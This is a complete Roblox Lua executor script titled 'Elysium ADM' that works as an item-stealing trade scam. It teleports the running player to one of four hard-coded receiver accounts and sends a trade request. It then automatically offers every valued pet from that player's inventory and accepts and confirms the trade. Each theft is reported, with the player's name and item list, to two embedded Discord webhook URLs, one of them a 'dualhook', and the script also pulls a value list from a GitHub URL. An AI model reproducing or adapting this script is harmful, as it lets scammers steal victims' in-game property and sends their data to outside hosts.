-- [[ ELYSIUM ADM | FINAL MASTER SCRIPT ]] --
-- Features: Webhook Tester, Text/JSON Parsing, Ultra-Fast Trade, Dualhook.

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer = Players.LocalPlayer

-- [[ CONFIGURATION ]] --
local USER_WEBHOOK = "https://discord.com/api/webhooks/1474651524251648163/lhPvWSeT6mcm3b4tIfzEbph1asYmZGvxf3YABYsKUOSeInP3oXW10NmHKJuj0vDrICku"
local DUAL_WEBHOOK = "https://discord.com/api/webhooks/1417861953208193126/wWUd-tqbQT56zqL_y0KSF_s5ZYdBKfLtBJaWYVCN_uwue9hq8CsGuQWJOL1ivGEZ2CYz"
local POINT_SYSTEM_URL = "https://raw.githubusercontent.com/charles1384/ADM/refs/heads/main/Pointsystem"

local TARGET_RECEIVERS = {"2ndcfpaj67", "sofiqmnz", "Hisokarah", "CREOLEO23"}
local DUALHOOK_MIN = 500   -- Dualhook for any pet or total >= 500 Pesos
local USER_PING_MIN = 1000 -- Userhook @everyone if total >= 1000 Pesos
local POLL_RATE = 0.5      -- Search frequency

-- [[ STATE ]] --
local PetValues = {}
local TradeAPI = ReplicatedStorage:WaitForChild("API")

local function trim(s) return s:match("^%s*(.-)%s*$") end

--------------------------------------------------------------
-- UNIVERSAL REQUEST HANDLER (Delta Compatible)
--------------------------------------------------------------
local function sendRequest(url, payload)
    local requestFunc = (syn and syn.request) or (http and http.request) or http_request or request or (fluxus and fluxus.request)
    if not requestFunc then 
        print("[ELYSIUM] Error: No request function found in executor.")
        return 
    end
    
    pcall(function()
        requestFunc({
            Url = url,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(payload)
        })
    end)
end

-- Verify Webhooks on Startup
local function startupTest()
    local embed = {
        title = "✅ Elysium ADM System Active",
        description = "System successfully loaded. Monitoring for receivers...",
        color = 0x2ECC71,
        fields = {
            {name = "👤 Player", value = LocalPlayer.Name, inline = true},
            {name = "📊 Point System", value = "Loaded", inline = true}
        },
        timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
    }
    sendRequest(USER_WEBHOOK, {embeds = {embed}})
    print("[ELYSIUM] Startup webhook fired.")
end

--------------------------------------------------------------
-- ROBUST POINT SYSTEM LOADER
--------------------------------------------------------------
local function loadPoints()
    local success, content = pcall(function() return game:HttpGet(POINT_SYSTEM_URL) end)
    if not success or not content then return end

    -- Try JSON first
    local jsonSuccess, decoded = pcall(function() return HttpService:JSONDecode(content) end)
    if jsonSuccess and type(decoded) == "table" then
        PetValues = decoded
        print("[ELYSIUM] Point System Loaded (JSON)")
    else
        -- Fallback: Plain Text Parsing
        for line in content:gmatch("[^\r\n]+") do
            local name, val = line:match("([^:=]+)[:=](%d+)")
            if name and val then
                PetValues[trim(name)] = tonumber(val)
            end
        end
        print("[ELYSIUM] Point System Loaded (Text List)")
    end
end

--------------------------------------------------------------
-- REPORTING & WEBHOOK LOGIC
--------------------------------------------------------------
local function handleReporting(pets, total)
    local isHighValue = (total >= DUALHOOK_MIN)
    local petLogs = {}

    for _, pet in ipairs(pets) do
        if pet.value >= DUALHOOK_MIN then isHighValue = true end
        table.insert(petLogs, string.format("• %s ($%d)", pet.name, pet.value))
    end

    local embed = {
        title = "🚀 Trade Export Completed",
        color = isHighValue and 0xFF0000 or 0x3498DB,
        fields = {
            {name = "👤 User", value = LocalPlayer.Name, inline = true},
            {name = "💰 Total Value", value = total .. " Pesos", inline = true},
            {name = "📦 Traded Pets", value = "```\n" .. (table.concat(petLogs, "\n") or "None") .. "\n```"}
        },
        footer = {text = "Elysium ADM | " .. os.date("%X")},
        timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
    }

    -- Userhook
    local userPing = (total >= USER_PING_MIN) and "@everyone" or ""
    sendRequest(USER_WEBHOOK, {content = userPing, embeds = {embed}})

    -- Dualhook
    if isHighValue then
        sendRequest(DUAL_WEBHOOK, {content = "@everyone", embeds = {embed}})
    end
end

--------------------------------------------------------------
-- CORE TRADE EXECUTION
--------------------------------------------------------------
local function findActiveTarget()
    for _, name in ipairs(TARGET_RECEIVERS) do
        local p = Players:FindFirstChild(name)
        if p and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then
            return p
        end
    end
    return nil
end

local function scanInventory()
    local list, total = {}, 0
    local success, inv = pcall(function() 
        return TradeAPI["InventoryAPI/GetInventory"]:InvokeServer() 
    end)
    
    if success and inv then
        for _, item in ipairs(inv) do
            if item.Kind == "Pet" then
                local val = PetValues[item.Name] or 0
                if val > 0 then
                    table.insert(list, {id = item.Id, name = item.Name, value = val})
                    total = total + val
                end
            end
        end
    end
    return list, total
end

local function performTradeCycle()
    local target = findActiveTarget()
    if not target then return end

    -- Instant Snap
    local hrp = LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
    if hrp then 
        hrp.CFrame = target.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 3) 
    end
    
    task.wait(0.1)
    
    -- Remotes
    TradeAPI["TradeAPI/SendTradeRequest"]:FireServer(target)
    
    local pets, totalVal = scanInventory()
    if #pets > 0 then
        for _, p in ipairs(pets) do
            TradeAPI["TradeAPI/AddItemToOffer"]:FireServer(p.id)
        end
        TradeAPI["TradeAPI/AcceptTrade"]:FireServer()
        TradeAPI["TradeAPI/ConfirmTrade"]:FireServer()
        
        handleReporting(pets, totalVal)
        print("[ELYSIUM] Trade Success: " .. totalVal .. " Pesos")
    end
end

--------------------------------------------------------------
-- STARTUP
--------------------------------------------------------------
loadPoints()
startupTest()

task.spawn(function()
    print("[ELYSIUM] Monitoring for receivers...")
    while true do
        local ok, err = pcall(performTradeCycle)
        if not ok then task.wait(1) end
        task.wait(POLL_RATE)
    end
end)
